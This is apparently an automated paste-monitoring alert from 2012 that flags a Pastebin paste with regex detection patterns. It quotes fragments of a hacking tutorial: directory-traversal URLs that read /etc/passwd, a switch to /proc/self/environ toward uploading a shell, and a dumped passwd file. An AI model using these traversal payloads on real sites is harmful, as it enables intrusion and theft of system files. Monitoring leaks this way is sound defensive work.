Potential leak of data: Directory Transversal
Detected 2 occurrence(s) of ‘http:\/\/.*\.\.\/\.\.\/\.\.’:
below: You can see here that I found the exact path after putting 19 "../" before "../etc/passwd". You have completed half of your exploit: Now suppose that our injection path looks like - http://www.site.com/index.php?cat=../../../../../../etc/passwd Now you have to do is that just replace "etc/passwd" with "proc/self/environ" and you will some codes like shown below: Uploading shell Now we have to use Tamper Data to edit our user
Detected 1 occurrence(s) of ‘root:.*:0:0:’:
lude]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337 so we go more directories up www.website.com/view.php?page=../../../../../etc/passwd we successfully included the etc/passwd file. root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown hal
Source: http://pastebin.com/raw.php?i=2u7GCttE
Tags: Directory Transversal, pastebin.com, UNIX Password File
This entry was posted on Friday, July 27th, 2012 at 06:45 and is filed under PasteMon.

